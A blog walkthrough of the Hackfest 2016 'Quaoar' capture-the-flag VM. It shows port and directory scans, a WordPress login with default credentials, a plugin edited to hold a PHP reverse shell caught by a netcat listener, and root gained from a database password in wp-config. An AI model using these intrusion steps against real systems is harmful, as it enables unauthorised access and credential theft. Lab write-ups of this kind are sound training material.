hackfest2016: Quaoar

[VM Completed on May 18th, 2017]

This machine was created for the Hackfest 2016 conference that happens in Quebec City, Quebec, Canada. This is a conference I am hoping to attend one year. Looks like a great time. There are three flags on this box according to the information on the VM. But I could only find 2, the shell and root flag. Not sure what the post-exploitation flag is. Anyways, let's jump into it.

nmap time:

root@kali:~# nmap -A -p- 192.168.1.243

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-17 08:52 ADT
Nmap scan report for Quaoar (192.168.1.243)
Host is up (0.00047s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL CAPA SASL PIPELINING STLS RESP-CODES TOP
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 STARTTLS have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ listed capabilities OK LOGINDISABLEDA0001 IDLE ID Pre-login ENABLE
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:14+00:00; +15s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: IMAP4rev1 have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ ENABLE capabilities OK listed AUTH=PLAINA0001 ID Pre-login IDLE
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: UIDL CAPA SASL(PLAIN) RESP-CODES PIPELINING USER TOP
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
MAC Address: 00:0C:29:82:B2:1D (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 14s, deviation: 0s, median: 14s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   Computer name: Quaoar
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: Quaoar
|_  System time: 2017-05-17T07:53:13-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms Quaoar (192.168.1.243)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.39 seconds

 

So we got some basic services opened here. Got a hit on a webserver, so let's check that out.

website1
 

website2

 

Alright. Not much to see here. Let's run directory buster on it and see what it finds.

root@kali:~# dirb http://192.168.1.243 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 17 08:57:37 2017
URL_BASE: http://192.168.1.243/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.1.243/ ----
+ http://192.168.1.243/LICENSE (CODE:200|SIZE:1672)                                
+ http://192.168.1.243/cgi-bin/ (CODE:403|SIZE:289)                                
+ http://192.168.1.243/hacking (CODE:200|SIZE:616848)                              
+ http://192.168.1.243/index (CODE:200|SIZE:100)                                   
+ http://192.168.1.243/robots (CODE:200|SIZE:271)                                  
+ http://192.168.1.243/robots.txt (CODE:200|SIZE:271)                              
+ http://192.168.1.243/server-status (CODE:403|SIZE:294)                           
==> DIRECTORY: http://192.168.1.243/upload/                                        
==> DIRECTORY: http://192.168.1.243/wordpress/ 

...truncated...

 

Wordpress was found. Awesome! Let's snoop there.

website3

 

Since this VM is marked as really easy, I'm going to try the default credentials to see what happens. It's always a good first choice anyways. Default credentials for wordpress is admin:admin. And voila! It worked.

website4

 

So I know there are easy ways to pop a reverse shell at this point with automated tools, but I like tinkering around. I edited the Hello Dolly plugin that comes with Wordpress and inserted a php reverse shell. I then opened a netcat listener and waited for the shell to pop once I activate the plugin. It worked, so now I have my low level shell.
 

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.2] from (UNKNOWN) [192.168.1.243] 36687
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 21:21:45 up 1 day, 13:30,  0 users,  load average: 0.08, 0.08, 0.17
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Quaoar:/$ 


Flag 1:

www-data@Quaoar:/home/wpadmin$ ls
ls
flag.txt

www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e

 

Now, it's time to get my root shell. First things first, let's check the passwd file:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh

.......Truncated....... 

    postgres:x:115:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    tomcat6:x:116:126::/usr/share/tomcat6:/bin/false
    wpadmin:x:1001:1001::/home/wpadmin:/bin/sh

 

There is a user called wpadmin. Again, let's try the easy stuff. I used su to switch user to wpadmin and used the password wpadmin. It worked. So now I know the user account. I can also ssh into the box now instead of using my netcat listener. More stable. Stable is good.

I tried to sudo su my way to root, but wpadmin isn't allowed to use sudo. I poked around and tried a few kernel exploits that were potentially capable of giving me my root prompt but no such luck. So since the box is running wordpress, I checked the config file to see if there anything juicy in there.

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/** */
define('WP_HOME','/wordpress/');
define('WP_SITEURL','/wordpress/');


Ha. Ha... this is interesting. This just might be the info I'm looking for.

wpadmin@Quaoar:/var/www/wordpress$ su
Password: rootpassword!
root@Quaoar:/var/www/wordpress# 

 

Flag 2:

root@Quaoar:/var/www/wordpress# cd /root
root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
root@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb

 

All done!!! Great VM for beginners to poke around on and see what they can do. It was really fun!

 

 

 

 

Add new comment

Restricted HTML

  • Allowed HTML tags: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol start type> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id>
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.